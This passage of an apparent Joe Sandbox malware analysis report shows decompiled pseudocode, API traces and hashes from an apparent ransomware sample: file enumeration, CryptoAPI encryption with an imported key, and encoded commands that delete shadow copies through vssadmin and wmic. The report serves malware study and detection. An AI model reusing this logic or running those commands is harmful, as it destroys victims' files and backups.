									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);
									_t64 = GetFileSize(_t54, 0);
									_v12 = 0;
									if(_t64 < 0x40000000) {
										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);
										if(_t67 != 0) {
											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E0FE68260(_t67, "*******************") != 0) {
												_t50 = lstrlenA("*******************");
												_t15 = _t67 + 1; // 0x1
												_v12 = E0FE66B40(_t15 + _t50);
											}
											VirtualFree(_t67, 0, 0x8000);
										}
										_t66 = _v16;
									}
									CloseHandle(_t54);
									_t53 = _v12;
									if(_t53 == 0) {
										L19:
										 *_v20 = 0;
										goto L20;
									}
								}
							}
						}
					}
					break;
					L20:
				} while (FindNextFileW(_v8,  &_v620) != 0);
				FindClose(_v8);
				return _t53;
			}

0x0fe66bab
0x0fe66baf
0x0fe66bbe
0x0fe66bc1
0x0fe66bc4
0x0fe66bde
0x0fe66be3
0x0fe66be6
0x0fe66bf0
0x0fe66c00
0x00000000
0x0fe66c1c
0x0fe66c24
0x0fe66c2b
0x0fe66c31
0x0fe66c34
0x0fe66c39
0x0fe66d08
0x0fe66d08
0x00000000
0x0fe66c40
0x0fe66c40
0x0fe66c46
0x0fe66c49
0x0fe66c4a
0x00000000
0x00000000
0x00000000
0x0fe66c4a
0x0fe66c4e
0x00000000
0x0fe66c54
0x0fe66c5a
0x0fe66c5e
0x00000000
0x0fe66c64
0x0fe66c77
0x0fe66c82
0x0fe66c86
0x0fe66c8f
0x0fe66ca0
0x0fe66ca4
0x0fe66cb7
0x0fe66cce
0x0fe66cd4
0x0fe66cde
0x0fe66cde
0x0fe66ce9
0x0fe66ce9
0x0fe66cef
0x0fe66cef
0x0fe66cf3
0x0fe66cf9
0x0fe66cfe
0x0fe66d0a
0x0fe66d0f
0x00000000
0x0fe66d0f
0x0fe66cfe
0x0fe66c5e
0x0fe66c4e
0x0fe66c39
0x00000000
0x0fe66d12
0x0fe66d22
0x0fe66d2d
0x0fe66d3b

APIs

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FE66BB2
lstrcatW.KERNEL32(00000000,0FE6FF44), ref: 0FE66BC4
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FE66BD2
lstrcmpW.KERNEL32(?,0FE6FF48,?,?), ref: 0FE66BFC
lstrcmpW.KERNEL32(?,0FE6FF4C,?,?), ref: 0FE66C12
lstrcatW.KERNEL32(00000000,?), ref: 0FE66C24
lstrlenW.KERNEL32(00000000,?,?), ref: 0FE66C2B
lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0FE66C5A
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0FE66C71
GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0FE66C7C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0FE66C9A
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0FE66CAF
lstrlenA.KERNEL32(*******************,?,?), ref: 0FE66CCE
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0FE66CE9
CloseHandle.KERNEL32(00000000,?,?), ref: 0FE66CF3
FindNextFileW.KERNEL32(?,?,?,?), ref: 0FE66D1C
FindClose.KERNEL32(?,?,?), ref: 0FE66D2D

Strings

.sql, xrefs: 0FE66C54
*******************, xrefs: 0FE66CB9, 0FE66CC9

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
String ID: *******************$.sql
API String ID: 3616287438-58436570
Opcode ID: a3c5026673e8541d3365ab14b521aba74d164e511f67638fb804e1216eb7f243
Instruction ID: d572069647e2d6ea93d65895b4dca508a2649bfc65958855fbdb71b43d1c90b8
Opcode Fuzzy Hash: a3c5026673e8541d3365ab14b521aba74d164e511f67638fb804e1216eb7f243
Instruction Fuzzy Hash: 6F41C271A9021DABDB20AF619C48FAF77BCEF06B95F405075F901F6141EB78AA10CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0FE68400 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 96
encryptionlibrarymemoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0FE68400(intOrPtr __ecx, intOrPtr __edx) {
				long* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t25;
				struct HINSTANCE__* _t33;
				_Unknown_base(*)()* _t34;
				long _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t48;

				_t46 = 0;
				_v16 = __ecx;
				_t25 =  &_v8;
				_v12 = __edx;
				__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000000);
				if(_t25 == 0) {
					L10:
					return _t46;
				} else {
					_t42 = 0;
					do {
						_t4 = _t42 + 0x61; // 0x61
						 *((char*)(_t48 + _t42 - 0x38)) = _t4;
						_t42 = _t42 + 1;
					} while (_t42 < 0x1a);
					_t40 = __edx + 1;
					_t47 = VirtualAlloc(0, _t40, 0x3000, 0x40);
					if(_t47 == 0 || _v12 >= _t40) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t33 = GetModuleHandleA( &_v32);
						if(_t33 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t34 = GetProcAddress(_t33, _t19);
							if(_t34 != 0) {
								 *_t34(_v8, _v12, _v16);
								_t46 =  !=  ? 1 : _t46;
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t33 = LoadLibraryA(_t18);
							if(_t33 != 0) {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						goto L10;
					}
				}
			}

0x0fe68410
0x0fe68412
0x0fe68417
0x0fe6841d
0x0fe68420
0x0fe68428
0x0fe684f2
0x0fe684fa
0x0fe6842e
0x0fe6842e
0x0fe68430
0x0fe68430
0x0fe68433
0x0fe68437
0x0fe68438
0x0fe68444
0x0fe6844e
0x0fe68452
0x0fe68500
0x0fe6850e
0x0fe6851c
0x0fe68461
0x0fe68464
0x0fe6846c
0x0fe68473
0x0fe6847a
0x0fe68480
0x0fe68484
0x0fe6848b
0x0fe68492
0x0fe68499
0x0fe6849d
0x0fe684a5
0x0fe684b5
0x0fe684b5
0x0fe684ba
0x0fe684c2
0x0fe684cd
0x0fe684d6
0x0fe684d6
0x0fe684a7
0x0fe684a7
0x0fe684ab
0x0fe684b3
0x00000000
0x00000000
0x0fe684b3
0x0fe684de
0x0fe684ec
0x00000000
0x0fe684ec
0x0fe68452

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FE68420
VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0FE68448
GetModuleHandleA.KERNEL32(?), ref: 0FE6849D
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FE684AB
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FE684BA
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FE684DE
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FE684EC
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0FE6292B), ref: 0FE68500
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0FE6292B), ref: 0FE6850E

Strings

CryptGenRandomAdvapi32.dll, xrefs: 0FE684B5, 0FE684B8
Advapi32.dll, xrefs: 0FE684A7, 0FE684AA

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: ef1133a00187d5804e2f01ba836974ce69a52c91445677ef2e9e7c78ce3e4f12
Instruction ID: 8bb64b77177dc2d296b77a6adc8dc5a007c2b31bd89333f058ac0f0600bdb0cd
Opcode Fuzzy Hash: ef1133a00187d5804e2f01ba836974ce69a52c91445677ef2e9e7c78ce3e4f12
Instruction Fuzzy Hash: 7F31A171E4020DAFDB108FE6DC49BEEBBB9EF45B52F104069EA01F6180D7789A108B64

Uniqueness

Uniqueness Score: -1.00%

Function 0FE66660 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 89
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0FE66660(BYTE* _a4, int _a8, int _a12, intOrPtr* _a16, intOrPtr _a20) {
				long* _v8;
				long* _v12;
				int _v16;
				char _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long** _t26;
				char* _t31;
				int _t33;
				long _t36;

				EnterCriticalSection(0xfe72a48);
				_v8 = 0;
				_v12 = 0;
				_t26 =  &_v8;
				__imp__CryptAcquireContextW(_t26, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000000);
				if(_t26 != 0) {
					L6:
					_v16 = 0;
					if(CryptImportKey(_v8, _a4, _a8, 0, 0,  &_v12) != 0) {
						_v20 = 0xa;
						_t31 =  &_v20;
						__imp__CryptGetKeyParam(_v12, 8,  &_v28, _t31, 0);
						_v32 = _t31;
						 *_a16 = 0xc8;
						_t33 = _a12;
						__imp__CryptEncrypt(_v12, 0, 1, 0, _t33, _a16, _a20);
						_v16 = _t33;
						_v24 = GetLastError();
						if(_v16 == 0) {
							E0FE636C0(_t34);
						}
					}
					CryptReleaseContext(_v8, 0);
					LeaveCriticalSection(0xfe72a48);
					return _v16;
				}
				_t36 = GetLastError();
				if(_t36 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t36 != 0) {
					goto L6;
				}
				return 0;
			}

0x0fe6666b
0x0fe66671
0x0fe66678
0x0fe6668d
0x0fe66691
0x0fe66699
0x0fe666d1
0x0fe666d1
0x0fe666f4
0x0fe666f6
0x0fe666ff
0x0fe6670d
0x0fe66713
0x0fe66719
0x0fe66727
0x0fe66735
0x0fe6673b
0x0fe66744
0x0fe6674b
0x0fe66750
0x0fe66750
0x0fe6674b
0x0fe6675b
0x0fe66766
0x00000000
0x0fe6676c
0x0fe6669b
0x0fe666a6
0x00000000
0x0fe666ca
0x0fe666b7
0x0fe666bf
0x00000000
0x0fe666c8
0x00000000

APIs

EnterCriticalSection.KERNEL32(0FE72A48,?,0FE638F4,00000000,00000000,00000000,?,00000800), ref: 0FE6666B
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,?,0FE638F4,00000000,00000000,00000000), ref: 0FE66691
GetLastError.KERNEL32(?,0FE638F4,00000000,00000000,00000000), ref: 0FE6669B
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FE638F4,00000000,00000000,00000000), ref: 0FE666B7
CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,0FE638F4,00000000,00000000), ref: 0FE666EC
CryptGetKeyParam.ADVAPI32(00000000,00000008,0FE638F4,0000000A,00000000,?,0FE638F4,00000000), ref: 0FE6670D
CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,0FE638F4,?,0FE638F4,00000000), ref: 0FE66735
GetLastError.KERNEL32(?,0FE638F4,00000000), ref: 0FE6673E
CryptReleaseContext.ADVAPI32(00000000,00000000,?,0FE638F4,00000000,00000000), ref: 0FE6675B
LeaveCriticalSection.KERNEL32(0FE72A48,?,0FE638F4,00000000,00000000), ref: 0FE66766

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0FE66686, 0FE666AC

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireCriticalErrorLastSection$EncryptEnterImportLeaveParamRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 72144047-1948191093
Opcode ID: cb3575c4476d30356a58e68628b9bd3616f4c3ebe1d1040946c71f76c7827e30
Instruction ID: d3e4e2750df065521610a9cff4345cf9c170171bec9836151ef6ac3ae6b28d4c
Opcode Fuzzy Hash: cb3575c4476d30356a58e68628b9bd3616f4c3ebe1d1040946c71f76c7827e30
Instruction Fuzzy Hash: 20316E74A9030DBBDB10DFA1DD59FEF77B9AB48B45F104058F601AA181DBB8AA009F61

Uniqueness

Uniqueness Score: -1.00%

Function 0FE66DF0 Relevance: 13.6, APIs: 9, Instructions: 109
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0FE66DF0(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
				void* _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				struct _WIN32_FIND_DATAW _v616;
				void* _t35;
				signed int _t37;
				int _t39;
				signed int _t42;
				void* _t46;
				signed int* _t48;
				WCHAR* _t53;
				intOrPtr* _t54;
				short _t57;
				WCHAR* _t63;
				void* _t67;

				_v24 = __edx;
				_t63 = __ecx;
				"SVWj@h"();
				if(__eax == 0 || E0FE66BA0(__ecx) != 0) {
					L17:
					__eflags = 0;
					return 0;
				} else {
					E0FE66D40(__ecx);
					_t53 =  &(_t63[lstrlenW(__ecx)]);
					_v20 = _t53;
					lstrcatW(_t63, "*");
					_t35 = FindFirstFileW(_t63,  &_v616);
					_t57 = 0;
					_v12 = _t35;
					 *_t53 = 0;
					if(_t35 != 0xffffffff) {
						_t54 = _a12;
						do {
							_t37 = lstrcmpW( &(_v616.cFileName), ".");
							__eflags = _t37;
							if(_t37 != 0) {
								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
								__eflags = _t42;
								if(_t42 != 0) {
									lstrcatW(_t63,  &(_v616.cFileName));
									__eflags = _v616.dwFileAttributes & 0x00000010;
									if(__eflags == 0) {
										_v16 =  *_t54;
										_t46 = E0FE66AB0(_t63,  &_v616, __eflags, _t57, _a4);
										_t67 = _t67 + 8;
										 *_t54 =  *_t54 + _t46;
										asm("adc [ebx+0x4], edx");
										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
										if(__eflags <= 0) {
											if(__eflags < 0) {
												L12:
												_t48 = _a8;
												 *_t48 =  *_t48 + 1;
												__eflags =  *_t48;
											} else {
												__eflags = _v16 -  *_t54;
												if(_v16 <  *_t54) {
													goto L12;
												}
											}
										}
									} else {
										E0FE66DF0(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
										_t67 = _t67 + 0xc;
									}
									_t57 = 0;
									__eflags = 0;
									 *_v20 = 0;
								}
							}
							_t39 = FindNextFileW(_v12,  &_v616);
							__eflags = _t39;
						} while (_t39 != 0);
						FindClose(_v12);
						goto L17;
					} else {
						return 0xdeadbeaf;
					}
				}
			}

0x0fe66dfc
0x0fe66dff
0x0fe66e01
0x0fe66e08
0x0fe66f36
0x0fe66f36
0x0fe66f3c
0x0fe66e1d
0x0fe66e1d
0x0fe66e35
0x0fe66e38
0x0fe66e3b
0x0fe66e45
0x0fe66e4b
0x0fe66e4d
0x0fe66e50
0x0fe66e56
0x0fe66e64
0x0fe66e70
0x0fe66e7c
0x0fe66e82
0x0fe66e84
0x0fe66e96
0x0fe66e9c
0x0fe66e9e
0x0fe66ea8
0x0fe66eaa
0x0fe66eb1
0x0fe66ee2
0x0fe66ee5
0x0fe66eea
0x0fe66eed
0x0fe66eef
0x0fe66ef2
0x0fe66ef5
0x0fe66ef7
0x0fe66f00
0x0fe66f00
0x0fe66f03
0x0fe66f03
0x0fe66ef9
0x0fe66efc
0x0fe66efe
0x00000000
0x00000000
0x0fe66efe
0x0fe66ef7
0x0fe66eb3
0x0fe66ec7
0x0fe66ecc
0x0fe66ecc
0x0fe66f0e
0x0fe66f0e
0x0fe66f10
0x0fe66f10
0x0fe66e9e
0x0fe66f1d
0x0fe66f23
0x0fe66f23
0x0fe66f2e
0x00000000
0x0fe66e58
0x0fe66e63
0x0fe66e63
0x0fe66e56

APIs

Part of subcall function 0FE66780: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0FE66E06,00000000,?,?), ref: 0FE66793
Part of subcall function 0FE66780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0FE66E06,00000000,?,?), ref: 0FE6685A
Part of subcall function 0FE66780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0FE66E06,00000000,?,?), ref: 0FE66874
Part of subcall function 0FE66780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0FE66E06,00000000,?,?), ref: 0FE6688E
Part of subcall function 0FE66780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0FE66E06,00000000,?,?), ref: 0FE668A8

Part of subcall function 0FE66BA0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FE66BB2
Part of subcall function 0FE66BA0: lstrcatW.KERNEL32(00000000,0FE6FF44), ref: 0FE66BC4
Part of subcall function 0FE66BA0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FE66BD2
Part of subcall function 0FE66BA0: lstrcmpW.KERNEL32(?,0FE6FF48,?,?), ref: 0FE66BFC
Part of subcall function 0FE66BA0: lstrcmpW.KERNEL32(?,0FE6FF4C,?,?), ref: 0FE66C12
Part of subcall function 0FE66BA0: lstrcatW.KERNEL32(00000000,?), ref: 0FE66C24
Part of subcall function 0FE66BA0: lstrlenW.KERNEL32(00000000,?,?), ref: 0FE66C2B
Part of subcall function 0FE66BA0: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0FE66C5A
Part of subcall function 0FE66BA0: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0FE66C71
Part of subcall function 0FE66BA0: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0FE66C7C
Part of subcall function 0FE66BA0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0FE66C9A
Part of subcall function 0FE66BA0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0FE66CAF

Part of subcall function 0FE66D40: VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0FE66E22,00000000,?,?), ref: 0FE66D55
Part of subcall function 0FE66D40: wsprintfW.USER32 ref: 0FE66D63
Part of subcall function 0FE66D40: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0FE66D7F
Part of subcall function 0FE66D40: GetLastError.KERNEL32(?,?), ref: 0FE66D8C
Part of subcall function 0FE66D40: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0FE66DD8

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FE66E23
lstrcatW.KERNEL32(00000000,0FE6FF44), ref: 0FE66E3B
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FE66E45
lstrcmpW.KERNEL32(?,0FE6FF48,?,?), ref: 0FE66E7C
lstrcmpW.KERNEL32(?,0FE6FF4C,?,?), ref: 0FE66E96
lstrcatW.KERNEL32(00000000,?), ref: 0FE66EA8
lstrcatW.KERNEL32(00000000,0FE6FF7C), ref: 0FE66EB9
FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0FE66F1D
FindClose.KERNEL32(00003000,?,?), ref: 0FE66F2E

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: File$lstrcatlstrcmp$FindFolderPathSpecialVirtual$Alloclstrlen$CreateFirst$CloseErrorFreeLastNextReadSizewsprintf
String ID:
API String ID: 664581897-0
Opcode ID: 83a91ae1404f9ed08542fd17ad3c825aa96aa55352f5d4627f2bdebd0da30e33
Instruction ID: 3d2b9d784fd8d6f898d53d02df3fc12d37f2ab443ee776300e13a0c967b7bb15
Opcode Fuzzy Hash: 83a91ae1404f9ed08542fd17ad3c825aa96aa55352f5d4627f2bdebd0da30e33
Instruction Fuzzy Hash: 5831D371E5021DABCF10AF65DC849AEBBB9FF45794F0050B5F804EB111EB35AA10CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0FE634F0 Relevance: 12.1, APIs: 8, Instructions: 79
memorystringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FE634F0(CHAR* __ecx, WCHAR** __edx, WCHAR** _a4) {
				int _v8;
				CHAR* _v12;
				WCHAR** _v16;
				long _t11;
				WCHAR* _t17;
				WCHAR* _t18;
				void* _t23;
				void* _t28;
				int _t29;
				WCHAR** _t30;

				_v16 = __edx;
				_v12 = __ecx;
				_t29 = 0;
				_t11 = lstrlenA(__ecx);
				_v8 = _t11;
				_t23 = VirtualAlloc(0, _t11, 0x3000, 4);
				if(_t23 != 0) {
					if(CryptStringToBinaryA(_v12, 0, 1, _t23,  &_v8, 0, 0) != 0) {
						_t17 = VirtualAlloc(0, 0x100, 0x3000, 4);
						_t30 = _v16;
						 *_t30 = _t17;
						_t18 = VirtualAlloc(0, 0x100, 0x3000, 4);
						_t28 = _t23;
						 *_a4 = _t18;
						if( *_t23 != 0x3b) {
							do {
								_t28 = _t28 + 1;
							} while ( *_t28 != 0x3b);
						}
						 *_t28 = 0;
						wsprintfW( *_t30, L"%S", _t23);
						_t8 = _t28 + 1; // 0x2
						wsprintfW( *_a4, L"%S", _t8);
						_t29 = 1;
					}
					VirtualFree(_t23, 0, 0x8000);
				}
				return _t29;
			}

0x0fe634fa
0x0fe634ff
0x0fe63502
0x0fe63504
0x0fe63519
0x0fe6351e
0x0fe63522
0x0fe6353d
0x0fe6354c
0x0fe6354e
0x0fe6355f
0x0fe63561
0x0fe63566
0x0fe6356b
0x0fe6356d
0x0fe63570
0x0fe63570
0x0fe63571
0x0fe63570
0x0fe63584
0x0fe63587
0x0fe63589
0x0fe63597
0x0fe6359c
0x0fe6359c
0x0fe635a9
0x0fe635a9
0x0fe635b7

APIs

lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,0FE63673,00000000), ref: 0FE63504
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,0FE63673,00000000), ref: 0FE6351C
CryptStringToBinaryA.CRYPT32(0FE63673,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0FE63535
VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,?,0FE63673,00000000), ref: 0FE6354C
VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,?,0FE63673,00000000), ref: 0FE63561
wsprintfW.USER32 ref: 0FE63587
wsprintfW.USER32 ref: 0FE63597
VirtualFree.KERNEL32(00000000,00000000,00008000,?,0FE63673,00000000), ref: 0FE635A9

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$wsprintf$BinaryCryptFreeStringlstrlen
String ID:
API String ID: 2885909284-0
Opcode ID: a9004d3c01990ed29d579552b0de575021fe5b3e4a00b7697d95536901db9c11
Instruction ID: ff4e7cad99a64442f25587e61140d2a20b145800090b139303d5321763d5df8f
Opcode Fuzzy Hash: a9004d3c01990ed29d579552b0de575021fe5b3e4a00b7697d95536901db9c11
Instruction Fuzzy Hash: 6F21C3B1A8031C7FEB219E659C41F9BBFECEF45B94F100065F604F7281D6B56A008B90

Uniqueness

Uniqueness Score: -1.00%

Function 0FE645B0 Relevance: 78.8, APIs: 5, Strings: 40, Instructions: 99
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0FE645B0(void* __eflags) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				short _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				short _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				short* _v176;
				short* _t51;
				WCHAR* _t59;
				void* _t62;
				signed int _t66;
				void* _t69;

				if(E0FE63CF0(_t62) == 0) {
					_v172 = 0x63005c;
					_v168 = 0x64006d;
					_v8 = 0;
					_t59 =  &_v172;
					_v164 = 0x65002e;
					_t51 =  &_v84;
					_v160 = 0x650078;
					_v156 = 0;
					_v84 = 0x63002f;
					_v80 = 0x760020;
					_v76 = 0x730073;
					_v72 = 0x640061;
					_v68 = 0x69006d;
					_v64 = 0x20006e;
					_v60 = 0x650064;
					_v56 = 0x65006c;
					_v52 = 0x650074;
					_v48 = 0x730020;
					_v44 = 0x610068;
					_v40 = 0x6f0064;
					_v36 = 0x730077;
					_v32 = 0x2f0020;
					_v28 = 0x6c0061;
					_v24 = 0x20006c;
					_v20 = 0x71002f;
					_v16 = 0x690075;
					_v12 = 0x740065;
				} else {
					_v152 = 0x77005c;
					_v148 = 0x650062;
					_t59 =  &_v152;
					_v144 = 0x5c006d;
					_t51 =  &_v120;
					_v140 = 0x6d0077;
					_v136 = 0x630069;
					_v132 = 0x65002e;
					_v128 = 0x650078;
					_v124 = 0;
					_v120 = 0x680073;
					_v116 = 0x640061;
					_v112 = 0x77006f;
					_v108 = 0x6f0063;
					_v104 = 0x790070;
					_v100 = 0x640020;
					_v96 = 0x6c0065;
					_v92 = 0x740065;
					_v88 = 0x65;
				}
				_v176 = _t51;
				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
				if(_t69 != 0) {
					GetSystemDirectoryW(_t69, 0x100);
					lstrcatW(_t69, _t59);
					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);
					asm("sbb edi, edi");
					_t66 =  ~0x20;
				} else {
					_t66 = 0;
				}
